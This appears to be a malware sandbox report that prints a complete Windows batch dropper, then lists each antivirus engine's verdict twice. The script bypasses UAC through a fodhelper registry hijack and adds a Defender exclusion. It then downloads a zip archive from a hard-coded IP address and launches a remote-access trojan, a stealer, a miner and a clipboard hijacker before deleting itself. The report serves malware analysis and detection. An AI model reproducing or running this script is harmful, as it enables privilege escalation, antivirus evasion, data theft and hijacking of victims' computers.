Static | ZeroBOX

@echo off

copy "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "%temp%\X.exe"

reg add "HKCU\Software\Classes\.thm\Shell\Open\command" /v "" /d "%temp%\X.exe -WindowStyle Hidden -Command & {Add-MpPreference -ExclusionPath '%UserProfile%\AppData\Local\ServiceHub'}" /f

reg add "HKCU\Software\Classes\ms-settings\CurVer" /d ".thm" /f

fodhelper.exe

timeout "3"

echo yes | reg delete "HKCU\Software\Classes\.thm\Shell\Open\command" /f

echo yes | reg delete "HKCU\Software\Classes\ms-settings\CurVer" /f

timeout "60"

curl "45.66.230.113/Malware.zip" -O "%UserProfile%\AppData\Local\ServiceHub\Malware.zip"

tar -xf "%UserProfile%\AppData\Local\ServiceHub\Malware.zip"

del "%UserProfile%\AppData\Local\ServiceHub\Malware.zip"

start "" "%UserProfile%\AppData\Local\ServiceHub\Rat.exe"

start "" "%UserProfile%\AppData\Local\ServiceHub\Stealer.exe"

start "" "%UserProfile%\AppData\Local\ServiceHub\Miner.exe"

start "" "%UserProfile%\AppData\Local\ServiceHub\Clipper.exe"

del "%temp%\X.exe"

del "%~f0"

Antivirus	Signature
Bkav	Clean
Lionic	Clean
DrWeb	Clean
ClamAV	Clean
CMC	Clean
CAT-QuickHeal	Clean
ALYac	Clean
Malwarebytes	Clean
VIPRE	Trojan.GenericKD.69403469
Sangfor	Clean
K7AntiVirus	Clean
K7GW	Clean
BitDefenderTheta	Clean
VirIT	Clean
Cyren	Clean
Symantec	Clean
ESET-NOD32	BAT/TrojanDownloader.Agent.PDG
TrendMicro-HouseCall	Clean
Avast	Clean
Cynet	Clean
Kaspersky	HEUR:Trojan.BAT.Agent.gen
BitDefender	Trojan.GenericKD.69403469
NANO-Antivirus	Clean
SUPERAntiSpyware	Clean
MicroWorld-eScan	Trojan.GenericKD.69403469
Tencent	Clean
Sophos	Clean
F-Secure	Clean
Baidu	Clean
Zillya	Clean
TrendMicro	Clean
McAfee-GW-Edition	BehavesLike.Backdoor.xq
FireEye	Trojan.GenericKD.69403469
Emsisoft	Trojan.GenericKD.69403469 (B)
Ikarus	Clean
Jiangmin	Clean
Avira	Clean
Antiy-AVL	Clean
Microsoft	Clean
Gridinsoft	Clean
Xcitium	Clean
Arcabit	Trojan.Generic.D423034D
ViRobot	Clean
ZoneAlarm	HEUR:Trojan.BAT.Agent.gen
GData	Trojan.GenericKD.69403469
Google	Clean
AhnLab-V3	Clean
Acronis	Clean
McAfee	Clean
MAX	malware (ai score=83)
VBA32	Clean
Zoner	Clean
Rising	Clean
Yandex	Clean
TACHYON	Clean
Fortinet	Clean
AVG	Clean
Panda	Clean

Antivirus

Signature

Bkav

Clean

Lionic

Clean

DrWeb

Clean

ClamAV

Clean

CMC

Clean

CAT-QuickHeal

Clean

ALYac

Clean

Malwarebytes

Clean

VIPRE

Trojan.GenericKD.69403469

Sangfor

Clean

K7AntiVirus

Clean

K7GW

Clean

BitDefenderTheta

Clean

VirIT

Clean

Cyren

Clean

Symantec

Clean

ESET-NOD32

BAT/TrojanDownloader.Agent.PDG

TrendMicro-HouseCall

Clean

Avast

Clean

Cynet

Clean

Kaspersky

HEUR:Trojan.BAT.Agent.gen

BitDefender

Trojan.GenericKD.69403469

NANO-Antivirus

Clean

SUPERAntiSpyware

Clean

MicroWorld-eScan

Trojan.GenericKD.69403469

Tencent

Clean

Sophos

Clean

F-Secure

Clean

Baidu

Clean

Zillya

Clean

TrendMicro

Clean

McAfee-GW-Edition

BehavesLike.Backdoor.xq

FireEye

Trojan.GenericKD.69403469

Emsisoft

Trojan.GenericKD.69403469 (B)

Ikarus

Clean

Jiangmin

Clean

Avira

Clean

Antiy-AVL

Clean

Microsoft

Clean

Gridinsoft

Clean

Xcitium

Clean

Arcabit

Trojan.Generic.D423034D

ViRobot

Clean

ZoneAlarm

HEUR:Trojan.BAT.Agent.gen

GData

Trojan.GenericKD.69403469

Google

Clean

AhnLab-V3

Clean

Acronis

Clean

McAfee

Clean

MAX

malware (ai score=83)

VBA32

Clean

Zoner

Clean

Rising

Clean

Yandex

Clean

TACHYON

Clean

Fortinet

Clean

AVG

Clean

Panda

Clean